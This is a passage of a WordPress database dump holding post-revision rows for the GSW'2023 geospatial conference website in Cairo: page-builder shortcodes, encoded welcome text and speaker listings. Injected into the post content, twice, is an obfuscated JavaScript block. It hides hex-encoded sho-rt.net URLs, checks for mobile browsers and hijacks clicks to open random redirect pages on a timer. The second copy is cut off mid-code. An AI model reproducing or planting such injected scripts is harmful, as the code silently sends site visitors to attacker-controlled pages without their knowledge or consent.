5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 21:35:08','2022-11-09 21:35:08','',3066,'https://gsw2023.com/?p=3246',0,'revision','',0),
(3248,1,'2022-11-09 21:36:50','2022-11-09 21:36:50','[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"0\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][/vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][/vc_column][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"][/bsf-info-box]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( 